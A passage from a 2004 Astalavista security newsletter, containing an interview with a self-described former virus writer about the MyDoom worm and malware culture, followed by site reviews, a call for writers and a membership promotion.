bother me, how does Joe sound? Astalavista: Ok, Joe, what was your primary intention when you e-mailed us, requesting this interview? Joe: Before answering this question, I would like to clarify something - I'm speaking for myself, I don't represent the virii/malware scene in any way, all views and answers are based on my viewpoint. On your question...the MyDoom Worm epidemic made me request this talk, and particularly the articles published around the major news portals. I especially don't like the audience there, because it's the audience that makes the portal. Do you actually believe you're going to see "the real story" at a site like these? I wanted to give more publicity of the malware scene, I wanted to talk about how easy it is to launch a trojan and about all these 250k's we keep seeing as rewards on the next worm. Something else, I wanted to get the publicity of this interview through Astalavista.com as a well-known and one of the most popular sites for security in the world, as by what I know, it's just a myth that the site is visited by novice and warez visitors only. I, personally believe that the site is visited by the major ITSecurity companies in the industry, also government visitors from all over the world. Astalavista.com just gives an overview of the "underground" in all of its forms, enough flettering:-) Astalavista: Our visitors would really appreciate if you give us more info about your background and experience in this field? Joe: Sure. I've been involved in the virii scene for the past 10 years. By involved, I mean participating in active virii coding groups, attenting private cons and local meetings, writing articles on how to code. I'm currently employed by a well known anti-virus vendor - they're aware of my background, so I'm just analyzing malware. During all the time I've been talking about ethics as well. Astalavista: How come are you a virii writer then? :) Joe: Honestly, how easy is it to code a virus nowadays? How easy is it to modify a public source code and then turn it into another mutation of the actual virus, and besides all, who do you think is going to do it? Those who don't even have a basic understanding of life and what's left when they play with "toys" like these, with the Internet helping them. I have always tried to restrict lamers from knowledge that is too powerfull to be mastered by a bunch of potheads. I have always been "poisoning" source code in order to stop this invasion, because I'm so sick of seeing *.aol.com's IPs requesting sources and binary's. Astalavista: Were you surprised by the MyDoom Worm's appearance? Joe: No, but I was surprised on the worm's early version that the author "released", then waited for a while and released the rest. Astalavista: You mean, that he's "playing with the victim", because it's absolutely sure that the worm will do its dirty work sooner or later? Joe: Exactly! It could have had a much greater impact, even SCO's partners could have been damaged, so I consider this as a warning done in the lamest, yet most powerful and easy to execute way, by a worm. Astalavista: Do you believe the attacks on SCO's web site by the MyDoom Worm are part of the "Linux War" mentioned in a recent article at http://internetnews.com/? Joe: Everything starts with finding an enemy. Having an enemy means he's powerfull enough to get you in trouble, so if it's a part of the "Linux War", then Linux is finnally getting the attention it deserves. TO me, the decoded "Nothing personal,the "I'm just doing my job" message sounds like someone's been hired to do something, but while doing it, he/she realises the impact it is going to have, so a personall message is left in the code. Astalavista: Guilty conscious perhaps, but if is so, then I'm sure the "employee" will take a certain % out of his payment, just because of the clue he/she's giving, and how about if someone is orchestrating all this for personal reasons? Joe: I doubt it's the fired Joe from the financial department; hiring someone else to do this, he would get caught for sure. Or Microsoft's advanced coding fans DDoSing http://kernel.org/ :-) But everything is possible, it might be someone who doesn't have anything better to do, might be someone who's just trying to open more work for the news agencies, or the devastating type of coder. Astalavista: Let's put it simple, why do malware coders code? Joe: I think you know the answer better than me - coding is power, seeing how your "baby" makes its first steps is also powerfull. Everyone has a reason to do something, or at least they believe they have a reason. For me, the most important point is how many people actually believe they're not going to get caught and keep thinking of ways to avoid that while coding their programs. Astalavista: And how about all of these 250k's rewards, are they going to do any good in the tracing of the author? I still hang out with the people I used to code my first worms with, we have real jobs, like freelance consultants or whatever, that's not the point, it's something else that connects us, it's the intimacy of all these moments when we coded our first "babies", and I doubt they will sell these moments even for 500k, I know what I'm saying, people change, but their history and background never do, with some exceptions, of course. I will tell you something - to me it's just a PR that "we" take security seriously enough to offer such a large amount of money in reward for someone who did damage our business. But how come they offer 250k, instead of proactively using these 250k to invest in a disaster recovery plan for a situation like this, and even someone gets caughed because of the 250k reward? who's lame, the caught coder or that company that gives away large amouts of money, because it can't use them to properly react in such situations, and no, not by increasing their bandwith? Astalavista: What is the best protection against worms? Joe: If I tell you, I will lose my job :-) Let's put it that way, who opens the e-mail attachments received? Astalavista: Who do you think made a small fortune out of the MyDoom problem? Joe: I think it isn't that small, but I am not talking about the financial situation at the moment :-) - the anti-virus vendors of course. In the first days of the mydoom worm, even google did extra "googling" especially for the MyDoom worm. I'm sure they made quite a lot of money with the instant sponsored links placed by the major anti-virus vendors, pointing to their commercial web sites, offering "unique" and free tools to remove the trojan. Astalavista: Finally, tell us your opinion on the current situation of the ITSecurity industry? Joe: It's obvious the industry is doing its best to deal with the major security issues today's networks and computers face, but it cannot seem to be able to properly react to the malware's one, more and more "coders" are taking advantage of that. Destruction is, as always, the easiest part. Astalavista: Thanks for the interview, Joe. We appreciate your opinion! Joe: Thanks for having me. 09. Security Sites Review --------------------- The idea of this section is to provide you with reviews of various, highly interesting and useful security related web sites. Before we recommend a site, we make sure that it provides its visitors with quality and a unique content. http://www.ccmostwanted.com/ The Most Wanted Cyber Criminals, I'm sure you're all going to enjoy this one, useful articles and daily news updates can be found as well http://security-forums.com/ Very friendly and highly popular security forums, everything related to Security is discussed http://www.rootprompt.org/ Security news and papers about linux security And the Open Source community 10. Astalavista needs YOU! --------------------- We are looking for authors that would be interested in writing security related articles for our newsletter, for people's ideas that we will turn into reality with their help and for anyone who thinks he/she could contribute to Astalavista in any way. Below we have summarized various issues that might concern you. - Write for Astalavista - What topics can I write about? You are encouraged to write on anything related to Security: General Security Security Basics Windows Security Linux Security IDS (Intrusion Detection Systems) Malicious Code Enterprise Security Penetration Testing Wireless Security Secure programming What do I get? Astalavista.com gets more than 200 000 unique visits every day, our Newsletter has more than 22,000 subscribers, so you can imagine what the exposure of your article and you will be, impressive, isn't it! We will make your work and you popular among the community! What are the rules? Your article has to be UNIQUE and written especially for Astalavista, we are not interested in republishing articles that have already been distributed somewhere else. Where can I see a sample of a contributed article? http://www.astalavista.com/media/files/malware.txt Where and how should I send my article? Direct your articles to dancho@astalavista.net and include a link to your article; once we take a look at it and decide whether is it qualified enough to be published, we will contact you within several days, please be patient. Thanks a lot all of you, our future contributors! 11. Special Promotions ------------------ - Advanced Security Member Portal - Astalavista.net --> Until the end of February <-- - 20$ off the real price($99) so you get a LIFETIME Membership for $79 Astalavista.net is a world-known and highly respected Security Portal offering an enormous database of very well sorted and categorized Information Security resources, files, tools, white papers, e-books etc. At your disposal there are also thousands of working proxies, wargames servers, where all the members try their skills and most importantly - the daily updates of the portal. - Over 12,000 members have already subscribed - Over 3.5 GByte of Security Related data, daily updates and always working links. - Access to thousands of anonymous proxies from all over the world, daily updates - Security Forums Community where thousands of individuals are ready to share their knowledge and answer your questions; replies are always received no matter of the question asked. - Several WarGames servers waiting to be hacked, information between those interested in this activity is shared through the forums or via personal messages, a growing archive of white papers containing info on previous hacks of these servers is available as well. http://www.astalavista.net/ The Advanced Security Member Portal 12. Final Words ----------- We hope you've enjoyed Issue 4 of Astalavista's Security Newsletter. Year 2004 started with MyDoom worm, let's hope it's not going to end with the Superworm. The topic of this issue was obviously malware, we decided that the Newsletter, as highly popular and read by both home and enterprise users, will provide the two audiences with useful information on how to protect their home and enterprise systems. Don't be naive on anything you receive in your mailbox! Editor - Dancho Danchev dancho@astalavista.net Proofreader - Yordanka Ilieva danny@astalavista.net